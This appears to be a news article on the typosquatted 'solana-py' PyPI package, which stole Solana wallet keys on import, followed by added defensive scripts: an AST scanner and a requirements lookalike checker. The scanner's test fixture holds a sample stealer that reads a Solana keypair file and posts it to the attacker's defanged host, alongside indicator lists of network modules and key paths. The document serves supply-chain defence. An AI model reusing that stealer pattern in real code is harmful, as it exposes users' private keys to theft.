Cybersecurity researchers have uncovered a malicious package on the Python Package Index (PyPI) that was disguised as a legitimate Solana blockchain library. Instead of performing its claimed function, the package was designed to steal private keys from users’ cryptocurrency wallets.
The legitimate Solana Python client is developed on GitHub under the name “solana-py”, but it is published on PyPI as “solana”. A threat actor took advantage of that mismatch and uploaded a malicious package named “solana-py” to PyPI, counting on developers to assume the GitHub name and the PyPI name were the same and to install it as the genuine Solana package.
The malicious “solana-py” package was downloaded 1,122 times before it was removed from PyPI. It was published as versions 0.34.3, 0.34.4 and 0.34.5, numbers chosen to track the official “solana” package, whose latest release at the time was 0.34.3. Matching the version numbers was a deliberate tactic: to anyone comparing the two listings, the fake looked like the current release of the right package.
The fake package contained most of the genuine Solana library's code, with one fatal change: the attacker added malicious code to the package's “__init__.py”, which runs every time the package is imported, and wrote it to harvest Solana wallet keys from any system that used the library.
The stolen keys were then sent to a Hugging Face Spaces endpoint under the attacker's control, “treeprime-gen.hf[.]space”. Abusing a legitimate hosting platform as the exfiltration endpoint is a common tactic: traffic to a well-known service blends in with normal activity and is far less likely to be blocked or noticed than traffic to an unknown domain.
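The harvest-and-exfiltrate shape described above is something a reviewer can look for before a package is ever imported. The script below is an added example, not code from the article or from Sonatype's research: it walks the AST of a module (meant for the `__init__.py` files of an unpacked sdist, wheel or site-packages tree) and flags one that both references key material and has a way to send data off the machine. The two module sources are constructed samples; the keypair path `~/.config/solana/id.json` (the Solana CLI's default location) and the indicator lists are assumptions, not details taken from the article. The exfiltration host is the one the article names, kept in its defanged form.

```python
import ast
import re
from dataclasses import dataclass, field
from pathlib import Path
from typing import Dict, List, Set

# Modules whose import gives a library's package __init__ an outbound channel
# (assumed heuristic list, not taken from the article).
NETWORK_MODULES = {"requests", "urllib", "http", "socket", "httpx", "aiohttp", "ftplib", "smtplib"}

# Fragments that suggest the code is reaching for key material. The Solana CLI default keypair
# path ~/.config/solana/id.json is an assumption; the article only says wallet keys were harvested.
KEY_MATERIAL_HINTS = ("id.json", ".config/solana", "keypair", "secret_key", "private_key", "wallet")

URL_RE = re.compile(r"https?://[^\s'\"]+")


@dataclass
class Findings:
    network_imports: Set[str] = field(default_factory=set)
    urls: List[str] = field(default_factory=list)
    key_material_refs: List[str] = field(default_factory=list)
    home_dir_lookup: bool = False

    @property
    def suspicious(self) -> bool:
        # The exfiltration shape: touches key material AND has an outbound channel.
        # A legitimate RPC client imports network modules too, so either signal alone is not enough.
        can_send = bool(self.urls) or bool(self.network_imports)
        return bool(self.key_material_refs) and can_send


def _root(module: str) -> str:
    return module.split(".", 1)[0]


def scan_module(source: str) -> Findings:
    """Walk the AST of one module and collect exfiltration indicators."""
    f = Findings()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if _root(alias.name) in NETWORK_MODULES:
                    f.network_imports.add(alias.name)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            if _root(node.module) in NETWORK_MODULES:
                f.network_imports.add(node.module)
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            f.urls.extend(URL_RE.findall(node.value))
            if any(hint in node.value for hint in KEY_MATERIAL_HINTS):
                f.key_material_refs.append(node.value)
        elif isinstance(node, ast.Call):
            func = node.func
            attr = func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", "")
            if attr in {"expanduser", "home"}:   # os.path.expanduser / Path.home
                f.home_dir_lookup = True
    return f


def scan_package_inits(root: Path) -> Dict[str, Findings]:
    """Scan every __init__.py under an unpacked sdist, wheel or site-packages tree."""
    return {str(p.relative_to(root)): scan_module(p.read_text(encoding="utf-8"))
            for p in root.rglob("__init__.py")}


# Constructed samples. The malicious one mirrors the shape the article describes (read a keypair,
# post it to the attacker's Hugging Face Space); the keypair path is assumed, the host is defanged.
MALICIOUS_INIT = '''
import os
from urllib.request import Request, urlopen

def _phone_home():
    path = os.path.expanduser("~/.config/solana/id.json")
    with open(path, "rb") as fh:
        urlopen(Request("https://treeprime-gen.hf[.]space/", data=fh.read()))
'''

BENIGN_INIT = '''
"""Solana Python client."""
from .rpc.api import Client
__version__ = "0.34.3"
'''

if __name__ == "__main__":
    for label, src in (("malicious", MALICIOUS_INIT), ("benign", BENIGN_INIT)):
        f = scan_module(src)
        print(f"{label}: suspicious={f.suspicious} imports={sorted(f.network_imports)} urls={f.urls}")
```

Heuristics like these produce false positives on wallet-management libraries that legitimately read keys and talk to RPC nodes, so a hit is a prompt to read the flagged file, not a verdict; the useful property is that a library whose `__init__.py` should only wire up submodules has no reason to trip both signals.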
Sonatype Warns of Dangerous PyPI Library Risks
The case exposes a weak point in the software supply chain. Sonatype, the security firm that discovered the package, noted that the PyPI project description of a legitimate library, “solders”, referred to the Solana client as “solana-py”; a developer following that reference could have installed the malicious package without realising it was not the real Solana client.
Ax Sharma of Sonatype reported that anyone who uses the real “solders” package on PyPI may accidentally install the typosquatted “solana-py” and introduce a crypto stealer into their application. That endangers not only the developer's own secrets but also the data of every user running the compromised software.
Ultimately, the incident shows how much care installing a package requires. Developers must verify that a library is the one they think it is, starting with a check that the name they install from PyPI matches the name the project itself publishes under, rather than the name of its GitHub repository or a name quoted in another package's description. They should also review their dependencies regularly for signs of tampering. Staying aware of newly emerging threats of this kind, and keeping third-party dependencies to the minimum a project actually needs, reduces the chance of being caught by the next such attack.
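Checking that a requested package is the one you think it is can be automated at the point where dependencies are declared. The script below is an added example, not part of the article or of any Sonatype tooling: it normalises requirement names the way PyPI does, compares them against an allowlist of names the project expects, treats a name that becomes an allowed name after stripping affixes such as `-py` (the exact trick the article describes), or that is within one edit of an allowed name, as a lookalike, and separately flags requirements that are not pinned with `==` or that carry no `--hash=` option. The allowlist, the affix list, the requirements file contents and the all-zeros digest are constructed for the example.

```python
import re
from typing import List, Optional, Set, Tuple

# Names this project expects to depend on. "solana" and "solders" are the two the article mentions;
# a real project would generate this from its reviewed lockfile.
ALLOWLIST = {"solana", "solders"}

# Affixes attackers bolt on to a real name; "solana-py" is the case the article describes.
# The wider list is an assumption.
AFFIXES = {"py", "python", "lib", "pkg", "dev"}

# Project name and optional comparison operator; anything after that is options such as --hash.
REQ_RE = re.compile(r"^(?P<name>[A-Za-z0-9][A-Za-z0-9._-]*)\s*(?P<op>==|>=|<=|~=|!=|>|<)?")


def normalize(name: str) -> str:
    """PEP 503 normalisation: case-fold and collapse runs of '-', '_' and '.' into one '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def strip_affixes(name: str) -> str:
    """Drop leading/trailing affixes so 'solana-py' and 'python-solana' both reduce to 'solana'."""
    parts = name.split("-")
    while len(parts) > 1 and parts[0] in AFFIXES:
        parts.pop(0)
    while len(parts) > 1 and parts[-1] in AFFIXES:
        parts.pop()
    return "-".join(parts)


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch one-character typos such as 'solanna'."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(name: str, allowed: Set[str]) -> Optional[str]:
    """Return the allowed name this one imitates, or None if it is simply unknown."""
    stripped = strip_affixes(name)
    if stripped in allowed:
        return stripped
    for candidate in sorted(allowed):
        if levenshtein(name, candidate) <= 1:
            return candidate
    return None


def check_requirements(text: str, allowlist: Set[str] = ALLOWLIST) -> List[Tuple[str, List[str]]]:
    """Return (name as written, issues) for every requirement; an empty issue list means it passed."""
    allowed = {normalize(n) for n in allowlist}
    results = []
    # pip writes --hash options on backslash-continued lines; fold them onto the requirement line.
    for line in text.replace("\\\n", " ").splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith("-"):      # blank, or an option line such as -r / --index-url
            continue
        match = REQ_RE.match(line)
        if not match:
            continue
        raw = match.group("name")
        issues = []
        name = normalize(raw)
        if name not in allowed:
            twin = lookalike_of(name, allowed)
            issues.append(f"LOOKALIKE of {twin}" if twin else "UNKNOWN")
        if match.group("op") != "==":
            issues.append("UNPINNED")
        if "--hash=" not in line:
            issues.append("NO_HASH")
        results.append((raw, issues))
    return results


# Constructed requirements file; the digest is a placeholder, not a real hash of any release.
SAMPLE_REQUIREMENTS = """\
solana==0.34.3 \\
    --hash=sha256:0000000000000000000000000000000000000000000000000000000000000000
solders==0.21.0
solana-py==0.34.5   # the package the article describes
Solana_py>=0.34
solanna==0.34.3
requests
"""

if __name__ == "__main__":
    for name, issues in check_requirements(SAMPLE_REQUIREMENTS):
        print(f"{name:12} {'OK' if not issues else ', '.join(issues)}")
```

The hash check matters here because the attacker mirrored the real version numbers: a version pin alone would have accepted `solana-py==0.34.3` just as happily as the genuine release, while `pip install --require-hashes` fails closed on any file whose digest is not the one recorded when the dependency was reviewed.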